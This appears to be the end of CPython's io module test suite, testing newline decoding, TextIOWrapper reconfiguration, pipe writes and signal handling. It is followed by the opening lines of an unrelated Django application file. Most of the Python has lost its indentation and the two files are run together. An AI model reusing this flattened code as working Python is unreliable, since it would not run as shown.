self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
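# Backing the view with an array of native ints gives it a multi-byte itemsize
# and an 'i' format, so the text wrapper must handle more than a plain
# unsigned-byte view.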
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
# The default chunk size is 8192 bytes, so t doesn't write data to buf yet.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
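# \u0D00 and \u0A00 merely contain the byte values of '\r' (0x0D) and '\n'
# (0x0A) in their code points; the decoder must not mistake them for newlines,
# so dec.newlines stays None.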
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
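# Any non-zero translate value enables newline translation just like True,
# while translate=0 must leave '\r\r\n' untouched.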
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
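# Every name exported in io.__all__ must exist and be either open/open_code,
# an exception type (including UnsupportedOperation), a SEEK_* constant, or an
# IOBase subclass.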
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# bpo-37330: The "U" mode has been removed in Python 3.11
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(os_helper.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a', encoding="utf-8")
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w", encoding="utf-8")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings_helper.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r", encoding="utf-8")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(os_helper.TESTFN, 'w', encoding="utf-8"):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x', encoding="utf-8")
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+', encoding="utf-8")
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
def test_check_encoding_warning(self):
# PEP 597: Raise warning when encoding is not specified
# and sys.flags.warn_default_encoding is set.
mod = self.io.__name__
filename = __file__
        code = textwrap.dedent(f'''\
            import sys
            from {mod} import open, TextIOWrapper
            import pathlib

            with open({filename!r}) as f:           # line 5
                pass

            pathlib.Path({filename!r}).read_text()  # line 8
            ''')
proc = assert_python_ok('-X', 'warn_default_encoding', '-c', code)
warnings = proc.err.splitlines()
self.assertEqual(len(warnings), 2)
self.assertTrue(
warnings[0].startswith(b"<string>:5: EncodingWarning: "))
self.assertTrue(
warnings[1].startswith(b"<string>:8: EncodingWarning: "))
def test_text_encoding(self):
# PEP 597, bpo-47000. io.text_encoding() returns "locale" or "utf-8"
# based on sys.flags.utf8_mode
code = "import io; print(io.text_encoding(None))"
proc = assert_python_ok('-X', 'utf8=0', '-c', code)
self.assertEqual(b"locale", proc.out.strip())
proc = assert_python_ok('-X', 'utf8=1', '-c', code)
self.assertEqual(b"utf-8", proc.out.strip())
@support.cpython_only
    # Depending on whether OpenWrapper was already created or not, the warning is
# emitted or not. For example, the attribute is already created when this
# test is run multiple times.
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_openwrapper(self):
self.assertIs(self.io.OpenWrapper, self.io.open)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
        # because a wio.close() that fails still considers that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@requires_alarm
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@requires_alarm
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
@requires_alarm
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
@requires_alarm
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@requires_alarm
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@requires_alarm
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r", encoding="latin1")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = import_helper.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@requires_alarm
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(loader, tests, pattern):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = loader.suiteClass()
for test in tests:
suite.addTest(loader.loadTestsFromTestCase(test))
return suite
if __name__ == "__main__":
unittest.main()
|
main.py
|
import argparse
import ctypes
import os
import sys
import tempfile
import threading
import time
import webbrowser
from typing import Dict, Optional
from django.conf import ENVIRONMENT_VARIABLE
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import get_random_string
from mypy_extensions import NoReturn
DEVELOPMENT_VERSION = "Development Version"
UNIX_VERSION = "Unix Version"
WINDOWS_VERSION = "Windows Version"
WINDOWS_PORTABLE_VERSION = "Windows Portable Version"
class PortableDirNotWritable(Exception):
pass
class PortIsBlockedError(Exception):
pass
